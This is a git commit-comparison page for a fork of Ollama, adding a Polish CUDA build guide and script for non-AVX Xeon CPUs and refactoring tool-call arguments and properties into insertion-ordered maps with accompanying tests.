Compare commits
12 Commits
parth/prom
...
main
| Author | SHA1 | Date |
|---|---|---|
|
|
5f179ff937 | |
|
|
f9abca6321 | |
|
|
a5710c4c07 | |
|
|
f8ba6e1946 | |
|
|
76912c062a | |
|
|
6c3faafed2 | |
|
|
e51dead636 | |
|
|
d087e46bd1 | |
|
|
37f6f3af24 | |
|
|
e1bdc23dd2 | |
|
|
2e78653ff9 | |
|
|
f5f74e12c1 |
|
|
@ -0,0 +1,38 @@
|
|||
# Instrukcja budowania dla Intel Xeon (bez AVX) + NVIDIA GPU (MX Linux)
|
||||
|
||||
Ten build naprawia błąd `Illegal instruction` na starszych procesorach i wymusza użycie CUDA.
|
||||
|
||||
## Wymagania
|
||||
* Zainstalowane `cuda-toolkit` (bez sterowników, jeśli już są w systemie).
|
||||
* Pobrane repozytorium z `git submodule update --init --recursive`.
|
||||
|
||||
## 1. Symlinki (Naprawa ścieżek MX Linux)
|
||||
MX Linux trzyma CUDA w niestandardowym miejscu. Wykonaj raz:
|
||||
```bash
|
||||
sudo mkdir -p /usr/local/cuda
|
||||
sudo ln -sFn /usr/lib/cuda/include /usr/local/cuda/include
|
||||
sudo ln -sFn /usr/lib/x86_64-linux-gnu/nvidia/current /usr/local/cuda/lib64
|
||||
```
|
||||
|
||||
```bash
|
||||
# Wyczyść stare
|
||||
rm -rf build
|
||||
|
||||
# Konfiguracja
|
||||
cmake -B build \
|
||||
-DOLLAMA_CUDA=ON \
|
||||
-DOLLAMA_VULKAN=OFF \
|
||||
-DGGML_VULKAN=OFF \
|
||||
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
|
||||
|
||||
# Kompilacja (1 wątek dla stabilności przy OC)
|
||||
cmake --build build -j1
|
||||
|
||||
# Zbudowanie pliku wykonywalnego
|
||||
go build .
|
||||
```
|
||||
|
||||
```bash
|
||||
sudo mv ollama /usr/bin/ollama
|
||||
sudo chmod +x /usr/bin/ollama
|
||||
```
|
||||
|
|
@ -6,6 +6,9 @@
|
|||
|
||||
# Ollama
|
||||
|
||||
W przypadku xeon 5675 przeczytaj plik NO_AVX_GUIDE.md!!
|
||||
Możesz zastosować też build_custom.sh dla automatycznego FIX
|
||||
|
||||
Get up and running with large language models.
|
||||
|
||||
### macOS
|
||||
|
|
|
|||
159
api/types.go
159
api/types.go
|
|
@ -3,6 +3,7 @@ package api
|
|||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"iter"
|
||||
"log/slog"
|
||||
"math"
|
||||
"os"
|
||||
|
|
@ -14,6 +15,7 @@ import (
|
|||
"github.com/google/uuid"
|
||||
|
||||
"github.com/ollama/ollama/envconfig"
|
||||
"github.com/ollama/ollama/internal/orderedmap"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
)
|
||||
|
||||
|
|
@ -227,13 +229,79 @@ type ToolCallFunction struct {
|
|||
Arguments ToolCallFunctionArguments `json:"arguments"`
|
||||
}
|
||||
|
||||
type ToolCallFunctionArguments map[string]any
|
||||
// ToolCallFunctionArguments holds tool call arguments in insertion order.
|
||||
type ToolCallFunctionArguments struct {
|
||||
om *orderedmap.Map[string, any]
|
||||
}
|
||||
|
||||
// NewToolCallFunctionArguments creates a new empty ToolCallFunctionArguments.
|
||||
func NewToolCallFunctionArguments() ToolCallFunctionArguments {
|
||||
return ToolCallFunctionArguments{om: orderedmap.New[string, any]()}
|
||||
}
|
||||
|
||||
// Get retrieves a value by key.
|
||||
func (t *ToolCallFunctionArguments) Get(key string) (any, bool) {
|
||||
if t == nil || t.om == nil {
|
||||
return nil, false
|
||||
}
|
||||
return t.om.Get(key)
|
||||
}
|
||||
|
||||
// Set sets a key-value pair, preserving insertion order.
|
||||
func (t *ToolCallFunctionArguments) Set(key string, value any) {
|
||||
if t == nil {
|
||||
return
|
||||
}
|
||||
if t.om == nil {
|
||||
t.om = orderedmap.New[string, any]()
|
||||
}
|
||||
t.om.Set(key, value)
|
||||
}
|
||||
|
||||
// Len returns the number of arguments.
|
||||
func (t *ToolCallFunctionArguments) Len() int {
|
||||
if t == nil || t.om == nil {
|
||||
return 0
|
||||
}
|
||||
return t.om.Len()
|
||||
}
|
||||
|
||||
// All returns an iterator over all key-value pairs in insertion order.
|
||||
func (t *ToolCallFunctionArguments) All() iter.Seq2[string, any] {
|
||||
if t == nil || t.om == nil {
|
||||
return func(yield func(string, any) bool) {}
|
||||
}
|
||||
return t.om.All()
|
||||
}
|
||||
|
||||
// ToMap returns a regular map (order not preserved).
|
||||
func (t *ToolCallFunctionArguments) ToMap() map[string]any {
|
||||
if t == nil || t.om == nil {
|
||||
return nil
|
||||
}
|
||||
return t.om.ToMap()
|
||||
}
|
||||
|
||||
func (t *ToolCallFunctionArguments) String() string {
|
||||
bts, _ := json.Marshal(t)
|
||||
if t == nil || t.om == nil {
|
||||
return "{}"
|
||||
}
|
||||
bts, _ := json.Marshal(t.om)
|
||||
return string(bts)
|
||||
}
|
||||
|
||||
func (t *ToolCallFunctionArguments) UnmarshalJSON(data []byte) error {
|
||||
t.om = orderedmap.New[string, any]()
|
||||
return json.Unmarshal(data, t.om)
|
||||
}
|
||||
|
||||
func (t ToolCallFunctionArguments) MarshalJSON() ([]byte, error) {
|
||||
if t.om == nil {
|
||||
return []byte("{}"), nil
|
||||
}
|
||||
return json.Marshal(t.om)
|
||||
}
|
||||
|
||||
type Tool struct {
|
||||
Type string `json:"type"`
|
||||
Items any `json:"items,omitempty"`
|
||||
|
|
@ -282,13 +350,78 @@ func (pt PropertyType) String() string {
|
|||
return fmt.Sprintf("%v", []string(pt))
|
||||
}
|
||||
|
||||
// ToolPropertiesMap holds tool properties in insertion order.
|
||||
type ToolPropertiesMap struct {
|
||||
om *orderedmap.Map[string, ToolProperty]
|
||||
}
|
||||
|
||||
// NewToolPropertiesMap creates a new empty ToolPropertiesMap.
|
||||
func NewToolPropertiesMap() *ToolPropertiesMap {
|
||||
return &ToolPropertiesMap{om: orderedmap.New[string, ToolProperty]()}
|
||||
}
|
||||
|
||||
// Get retrieves a property by name.
|
||||
func (t *ToolPropertiesMap) Get(key string) (ToolProperty, bool) {
|
||||
if t == nil || t.om == nil {
|
||||
return ToolProperty{}, false
|
||||
}
|
||||
return t.om.Get(key)
|
||||
}
|
||||
|
||||
// Set sets a property, preserving insertion order.
|
||||
func (t *ToolPropertiesMap) Set(key string, value ToolProperty) {
|
||||
if t == nil {
|
||||
return
|
||||
}
|
||||
if t.om == nil {
|
||||
t.om = orderedmap.New[string, ToolProperty]()
|
||||
}
|
||||
t.om.Set(key, value)
|
||||
}
|
||||
|
||||
// Len returns the number of properties.
|
||||
func (t *ToolPropertiesMap) Len() int {
|
||||
if t == nil || t.om == nil {
|
||||
return 0
|
||||
}
|
||||
return t.om.Len()
|
||||
}
|
||||
|
||||
// All returns an iterator over all properties in insertion order.
|
||||
func (t *ToolPropertiesMap) All() iter.Seq2[string, ToolProperty] {
|
||||
if t == nil || t.om == nil {
|
||||
return func(yield func(string, ToolProperty) bool) {}
|
||||
}
|
||||
return t.om.All()
|
||||
}
|
||||
|
||||
// ToMap returns a regular map (order not preserved).
|
||||
func (t *ToolPropertiesMap) ToMap() map[string]ToolProperty {
|
||||
if t == nil || t.om == nil {
|
||||
return nil
|
||||
}
|
||||
return t.om.ToMap()
|
||||
}
|
||||
|
||||
func (t ToolPropertiesMap) MarshalJSON() ([]byte, error) {
|
||||
if t.om == nil {
|
||||
return []byte("null"), nil
|
||||
}
|
||||
return json.Marshal(t.om)
|
||||
}
|
||||
|
||||
func (t *ToolPropertiesMap) UnmarshalJSON(data []byte) error {
|
||||
t.om = orderedmap.New[string, ToolProperty]()
|
||||
return json.Unmarshal(data, t.om)
|
||||
}
|
||||
|
||||
type ToolProperty struct {
|
||||
AnyOf []ToolProperty `json:"anyOf,omitempty"`
|
||||
Type PropertyType `json:"type,omitempty"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Description string `json:"description,omitempty"`
|
||||
Enum []any `json:"enum,omitempty"`
|
||||
Properties map[string]ToolProperty `json:"properties,omitempty"`
|
||||
AnyOf []ToolProperty `json:"anyOf,omitempty"`
|
||||
Type PropertyType `json:"type,omitempty"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Description string `json:"description,omitempty"`
|
||||
Enum []any `json:"enum,omitempty"`
|
||||
Properties *ToolPropertiesMap `json:"properties,omitempty"`
|
||||
}
|
||||
|
||||
// ToTypeScriptType converts a ToolProperty to a TypeScript type string
|
||||
|
|
@ -337,11 +470,11 @@ func mapToTypeScriptType(jsonType string) string {
|
|||
}
|
||||
|
||||
type ToolFunctionParameters struct {
|
||||
Type string `json:"type"`
|
||||
Defs any `json:"$defs,omitempty"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Required []string `json:"required,omitempty"`
|
||||
Properties map[string]ToolProperty `json:"properties"`
|
||||
Type string `json:"type"`
|
||||
Defs any `json:"$defs,omitempty"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Required []string `json:"required,omitempty"`
|
||||
Properties *ToolPropertiesMap `json:"properties"`
|
||||
}
|
||||
|
||||
func (t *ToolFunctionParameters) String() string {
|
||||
|
|
|
|||
|
|
@ -11,6 +11,24 @@ import (
|
|||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||
func testPropsMap(m map[string]ToolProperty) *ToolPropertiesMap {
|
||||
props := NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||
func testArgs(m map[string]any) ToolCallFunctionArguments {
|
||||
args := NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
func TestKeepAliveParsingFromJSON(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
|
|
@ -309,9 +327,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
|||
input: ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"name"},
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"name": {Type: PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string"}}}`,
|
||||
},
|
||||
|
|
@ -319,9 +337,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
|||
name: "no required",
|
||||
input: ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"name": {Type: PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
expected: `{"type":"object","properties":{"name":{"type":"string"}}}`,
|
||||
},
|
||||
|
|
@ -339,7 +357,7 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
|
|||
func TestToolCallFunction_IndexAlwaysMarshals(t *testing.T) {
|
||||
fn := ToolCallFunction{
|
||||
Name: "echo",
|
||||
Arguments: ToolCallFunctionArguments{"message": "hi"},
|
||||
Arguments: testArgs(map[string]any{"message": "hi"}),
|
||||
}
|
||||
|
||||
data, err := json.Marshal(fn)
|
||||
|
|
@ -529,7 +547,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
|||
expected: ToolProperty{
|
||||
Type: PropertyType{"object"},
|
||||
Description: "Location details",
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"address": {
|
||||
Type: PropertyType{"string"},
|
||||
Description: "Street address",
|
||||
|
|
@ -538,7 +556,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
|||
Type: PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
|
|
@ -566,22 +584,22 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
|||
expected: ToolProperty{
|
||||
Type: PropertyType{"object"},
|
||||
Description: "Event",
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"location": {
|
||||
Type: PropertyType{"object"},
|
||||
Description: "Location",
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"coordinates": {
|
||||
Type: PropertyType{"object"},
|
||||
Description: "GPS coordinates",
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"lat": {Type: PropertyType{"number"}, Description: "Latitude"},
|
||||
"lng": {Type: PropertyType{"number"}, Description: "Longitude"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
|
@ -591,7 +609,13 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
|||
var prop ToolProperty
|
||||
err := json.Unmarshal([]byte(tt.input), &prop)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, tt.expected, prop)
|
||||
|
||||
// Compare JSON representations since pointer comparison doesn't work
|
||||
expectedJSON, err := json.Marshal(tt.expected)
|
||||
require.NoError(t, err)
|
||||
actualJSON, err := json.Marshal(prop)
|
||||
require.NoError(t, err)
|
||||
assert.JSONEq(t, string(expectedJSON), string(actualJSON))
|
||||
|
||||
// Round-trip test: marshal and unmarshal again
|
||||
data, err := json.Marshal(prop)
|
||||
|
|
@ -600,7 +624,10 @@ func TestToolPropertyNestedProperties(t *testing.T) {
|
|||
var prop2 ToolProperty
|
||||
err = json.Unmarshal(data, &prop2)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, tt.expected, prop2)
|
||||
|
||||
prop2JSON, err := json.Marshal(prop2)
|
||||
require.NoError(t, err)
|
||||
assert.JSONEq(t, string(expectedJSON), string(prop2JSON))
|
||||
})
|
||||
}
|
||||
}
|
||||
|
|
@ -616,12 +643,12 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
|||
params: ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"name"},
|
||||
Properties: map[string]ToolProperty{
|
||||
Properties: testPropsMap(map[string]ToolProperty{
|
||||
"name": {
|
||||
Type: PropertyType{"string"},
|
||||
Description: "The name of the person",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string","description":"The name of the person"}}}`,
|
||||
},
|
||||
|
|
@ -638,7 +665,7 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
|||
s.Self = s
|
||||
return s
|
||||
}(),
|
||||
Properties: map[string]ToolProperty{},
|
||||
Properties: testPropsMap(map[string]ToolProperty{}),
|
||||
},
|
||||
expected: "",
|
||||
},
|
||||
|
|
@ -651,3 +678,235 @@ func TestToolFunctionParameters_String(t *testing.T) {
|
|||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestToolCallFunctionArguments_OrderPreservation(t *testing.T) {
|
||||
t.Run("marshal preserves insertion order", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
args.Set("zebra", "z")
|
||||
args.Set("apple", "a")
|
||||
args.Set("mango", "m")
|
||||
|
||||
data, err := json.Marshal(args)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Should preserve insertion order, not alphabetical
|
||||
assert.Equal(t, `{"zebra":"z","apple":"a","mango":"m"}`, string(data))
|
||||
})
|
||||
|
||||
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
|
||||
jsonData := `{"zebra":"z","apple":"a","mango":"m"}`
|
||||
|
||||
var args ToolCallFunctionArguments
|
||||
err := json.Unmarshal([]byte(jsonData), &args)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Verify iteration order matches JSON order
|
||||
var keys []string
|
||||
for k := range args.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
|
||||
})
|
||||
|
||||
t.Run("round trip preserves order", func(t *testing.T) {
|
||||
original := `{"z":1,"a":2,"m":3,"b":4}`
|
||||
|
||||
var args ToolCallFunctionArguments
|
||||
err := json.Unmarshal([]byte(original), &args)
|
||||
require.NoError(t, err)
|
||||
|
||||
data, err := json.Marshal(args)
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.Equal(t, original, string(data))
|
||||
})
|
||||
|
||||
t.Run("String method returns ordered JSON", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
args.Set("c", 3)
|
||||
args.Set("a", 1)
|
||||
args.Set("b", 2)
|
||||
|
||||
assert.Equal(t, `{"c":3,"a":1,"b":2}`, args.String())
|
||||
})
|
||||
|
||||
t.Run("Get retrieves correct values", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
args.Set("key1", "value1")
|
||||
args.Set("key2", 42)
|
||||
|
||||
v, ok := args.Get("key1")
|
||||
assert.True(t, ok)
|
||||
assert.Equal(t, "value1", v)
|
||||
|
||||
v, ok = args.Get("key2")
|
||||
assert.True(t, ok)
|
||||
assert.Equal(t, 42, v)
|
||||
|
||||
_, ok = args.Get("nonexistent")
|
||||
assert.False(t, ok)
|
||||
})
|
||||
|
||||
t.Run("Len returns correct count", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
assert.Equal(t, 0, args.Len())
|
||||
|
||||
args.Set("a", 1)
|
||||
assert.Equal(t, 1, args.Len())
|
||||
|
||||
args.Set("b", 2)
|
||||
assert.Equal(t, 2, args.Len())
|
||||
})
|
||||
|
||||
t.Run("empty args marshal to empty object", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
data, err := json.Marshal(args)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, `{}`, string(data))
|
||||
})
|
||||
|
||||
t.Run("zero value args marshal to empty object", func(t *testing.T) {
|
||||
var args ToolCallFunctionArguments
|
||||
assert.Equal(t, "{}", args.String())
|
||||
})
|
||||
}
|
||||
|
||||
func TestToolPropertiesMap_OrderPreservation(t *testing.T) {
|
||||
t.Run("marshal preserves insertion order", func(t *testing.T) {
|
||||
props := NewToolPropertiesMap()
|
||||
props.Set("zebra", ToolProperty{Type: PropertyType{"string"}})
|
||||
props.Set("apple", ToolProperty{Type: PropertyType{"number"}})
|
||||
props.Set("mango", ToolProperty{Type: PropertyType{"boolean"}})
|
||||
|
||||
data, err := json.Marshal(props)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Should preserve insertion order, not alphabetical
|
||||
expected := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
|
||||
assert.Equal(t, expected, string(data))
|
||||
})
|
||||
|
||||
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
|
||||
jsonData := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
|
||||
|
||||
var props ToolPropertiesMap
|
||||
err := json.Unmarshal([]byte(jsonData), &props)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Verify iteration order matches JSON order
|
||||
var keys []string
|
||||
for k := range props.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
|
||||
})
|
||||
|
||||
t.Run("round trip preserves order", func(t *testing.T) {
|
||||
original := `{"z":{"type":"string"},"a":{"type":"number"},"m":{"type":"boolean"}}`
|
||||
|
||||
var props ToolPropertiesMap
|
||||
err := json.Unmarshal([]byte(original), &props)
|
||||
require.NoError(t, err)
|
||||
|
||||
data, err := json.Marshal(props)
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.Equal(t, original, string(data))
|
||||
})
|
||||
|
||||
t.Run("Get retrieves correct values", func(t *testing.T) {
|
||||
props := NewToolPropertiesMap()
|
||||
props.Set("name", ToolProperty{Type: PropertyType{"string"}, Description: "The name"})
|
||||
props.Set("age", ToolProperty{Type: PropertyType{"integer"}, Description: "The age"})
|
||||
|
||||
v, ok := props.Get("name")
|
||||
assert.True(t, ok)
|
||||
assert.Equal(t, "The name", v.Description)
|
||||
|
||||
v, ok = props.Get("age")
|
||||
assert.True(t, ok)
|
||||
assert.Equal(t, "The age", v.Description)
|
||||
|
||||
_, ok = props.Get("nonexistent")
|
||||
assert.False(t, ok)
|
||||
})
|
||||
|
||||
t.Run("Len returns correct count", func(t *testing.T) {
|
||||
props := NewToolPropertiesMap()
|
||||
assert.Equal(t, 0, props.Len())
|
||||
|
||||
props.Set("a", ToolProperty{})
|
||||
assert.Equal(t, 1, props.Len())
|
||||
|
||||
props.Set("b", ToolProperty{})
|
||||
assert.Equal(t, 2, props.Len())
|
||||
})
|
||||
|
||||
t.Run("nil props marshal to null", func(t *testing.T) {
|
||||
var props *ToolPropertiesMap
|
||||
data, err := json.Marshal(props)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, `null`, string(data))
|
||||
})
|
||||
|
||||
t.Run("ToMap returns regular map", func(t *testing.T) {
|
||||
props := NewToolPropertiesMap()
|
||||
props.Set("a", ToolProperty{Type: PropertyType{"string"}})
|
||||
props.Set("b", ToolProperty{Type: PropertyType{"number"}})
|
||||
|
||||
m := props.ToMap()
|
||||
assert.Equal(t, 2, len(m))
|
||||
assert.Equal(t, PropertyType{"string"}, m["a"].Type)
|
||||
assert.Equal(t, PropertyType{"number"}, m["b"].Type)
|
||||
})
|
||||
}
|
||||
|
||||
func TestToolCallFunctionArguments_ComplexValues(t *testing.T) {
|
||||
t.Run("nested objects preserve order", func(t *testing.T) {
|
||||
jsonData := `{"outer":{"z":1,"a":2},"simple":"value"}`
|
||||
|
||||
var args ToolCallFunctionArguments
|
||||
err := json.Unmarshal([]byte(jsonData), &args)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Outer keys should be in order
|
||||
var keys []string
|
||||
for k := range args.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
assert.Equal(t, []string{"outer", "simple"}, keys)
|
||||
})
|
||||
|
||||
t.Run("arrays as values", func(t *testing.T) {
|
||||
args := NewToolCallFunctionArguments()
|
||||
args.Set("items", []string{"a", "b", "c"})
|
||||
args.Set("numbers", []int{1, 2, 3})
|
||||
|
||||
data, err := json.Marshal(args)
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.Equal(t, `{"items":["a","b","c"],"numbers":[1,2,3]}`, string(data))
|
||||
})
|
||||
}
|
||||
|
||||
func TestToolPropertiesMap_NestedProperties(t *testing.T) {
|
||||
t.Run("nested properties preserve order", func(t *testing.T) {
|
||||
props := NewToolPropertiesMap()
|
||||
|
||||
nestedProps := NewToolPropertiesMap()
|
||||
nestedProps.Set("z_field", ToolProperty{Type: PropertyType{"string"}})
|
||||
nestedProps.Set("a_field", ToolProperty{Type: PropertyType{"number"}})
|
||||
|
||||
props.Set("outer", ToolProperty{
|
||||
Type: PropertyType{"object"},
|
||||
Properties: nestedProps,
|
||||
})
|
||||
|
||||
data, err := json.Marshal(props)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Both outer and inner should preserve order
|
||||
expected := `{"outer":{"type":"object","properties":{"z_field":{"type":"string"},"a_field":{"type":"number"}}}}`
|
||||
assert.Equal(t, expected, string(data))
|
||||
})
|
||||
}
|
||||
|
|
|
|||
|
|
@ -147,6 +147,7 @@ export const highlighterPromise = createHighlighter({
|
|||
"c",
|
||||
"cpp",
|
||||
"sql",
|
||||
"swift",
|
||||
"yaml",
|
||||
"markdown",
|
||||
],
|
||||
|
|
|
|||
|
|
@ -997,7 +997,7 @@ func (s *Server) chat(w http.ResponseWriter, r *http.Request) error {
|
|||
for _, toolCall := range res.Message.ToolCalls {
|
||||
// continues loop as tools were executed
|
||||
toolsExecuted = true
|
||||
result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments)
|
||||
result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments.ToMap())
|
||||
if err != nil {
|
||||
errContent := fmt.Sprintf("Error: %v", err)
|
||||
toolErrMsg := store.NewMessage("tool", errContent, nil)
|
||||
|
|
@ -1558,13 +1558,13 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
|
|||
|
||||
tool.Function.Parameters.Type = "object"
|
||||
tool.Function.Parameters.Required = []string{}
|
||||
tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
|
||||
tool.Function.Parameters.Properties = api.NewToolPropertiesMap()
|
||||
|
||||
if schemaProps, ok := toolSchema["schema"].(map[string]any); ok {
|
||||
tool.Function.Parameters.Type = getStringFromMap(schemaProps, "type", "object")
|
||||
|
||||
if props, ok := schemaProps["properties"].(map[string]any); ok {
|
||||
tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
|
||||
tool.Function.Parameters.Properties = api.NewToolPropertiesMap()
|
||||
|
||||
for propName, propDef := range props {
|
||||
if propMap, ok := propDef.(map[string]any); ok {
|
||||
|
|
@ -1572,7 +1572,7 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
|
|||
Type: api.PropertyType{getStringFromMap(propMap, "type", "string")},
|
||||
Description: getStringFromMap(propMap, "description", ""),
|
||||
}
|
||||
tool.Function.Parameters.Properties[propName] = prop
|
||||
tool.Function.Parameters.Properties.Set(propName, prop)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -0,0 +1,44 @@
|
|||
---
|
||||
|
||||
### 2. `build_custom.sh` (Skrypt automatyzujący)
|
||||
To jest opcja "Pro". Zamiast wklepywać te komendy ręcznie, tworzysz skrypt bashowy. Jak będziesz chciał zaktualizować Ollamę za pół roku, po prostu odpalisz `./build_custom.sh` i pójdziesz na kawę.
|
||||
|
||||
**Zawartość pliku:**
|
||||
```bash
|
||||
#!/bin/bash
|
||||
|
||||
# Skrypt budowania Ollama dla Xeon X5675 (No AVX) + GTX 1070
|
||||
# Uruchom to w głównym katalogu repozytorium
|
||||
|
||||
echo "--- [1/4] Czyszczenie poprzedniego builda ---"
|
||||
rm -rf build
|
||||
go clean -cache
|
||||
|
||||
echo "--- [2/4] Konfiguracja CMake (CUDA ON, Vulkan OFF) ---"
|
||||
# Flagi kluczowe dla Twojego systemu
|
||||
cmake -B build \
|
||||
-DOLLAMA_CUDA=ON \
|
||||
-DOLLAMA_VULKAN=OFF \
|
||||
-DGGML_VULKAN=OFF \
|
||||
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "Błąd konfiguracji CMake!"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "--- [3/4] Kompilacja silnika (Tryb bezpieczny -j1) ---"
|
||||
# Używamy -j1 bo przy OC Twój Xeon może być niestabilny przy kompilacji
|
||||
cmake --build build -j1
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "Błąd kompilacji!"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "--- [4/4] Budowanie pliku binarnego Go ---"
|
||||
go build .
|
||||
|
||||
echo "--- GOTOWE! ---"
|
||||
echo "Twój plik 'ollama' jest gotowy."
|
||||
echo "Aby zainstalować wpisz: sudo mv ollama /usr/bin/ollama"
|
||||
10
cmd/cmd.go
10
cmd/cmd.go
|
|
@ -45,6 +45,7 @@ import (
|
|||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/types/syncmap"
|
||||
"github.com/ollama/ollama/version"
|
||||
xcmd "github.com/ollama/ollama/x/cmd"
|
||||
)
|
||||
|
||||
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
|
||||
|
|
@ -517,6 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
|||
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
|
||||
}
|
||||
|
||||
// Check for experimental flag
|
||||
isExperimental, _ := cmd.Flags().GetBool("experimental")
|
||||
|
||||
if interactive {
|
||||
if err := loadOrUnloadModel(cmd, &opts); err != nil {
|
||||
var sErr api.AuthorizationError
|
||||
|
|
@ -543,6 +547,11 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
|||
}
|
||||
}
|
||||
|
||||
// Use experimental agent loop with
|
||||
if isExperimental {
|
||||
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive)
|
||||
}
|
||||
|
||||
return generateInteractive(cmd, opts)
|
||||
}
|
||||
return generate(cmd, opts)
|
||||
|
|
@ -1754,6 +1763,7 @@ func NewCLI() *cobra.Command {
|
|||
runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
|
||||
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
|
||||
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
|
||||
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
|
||||
|
||||
stopCmd := &cobra.Command{
|
||||
Use: "stop MODEL",
|
||||
|
|
|
|||
|
|
@ -40,6 +40,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
|
|||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||
fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts")
|
||||
|
||||
fmt.Fprintln(os.Stderr, "")
|
||||
fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
|
||||
|
||||
|
|
|
|||
|
|
@ -1,156 +0,0 @@
|
|||
# HuggingFace Prompt Renderer MCP Server
|
||||
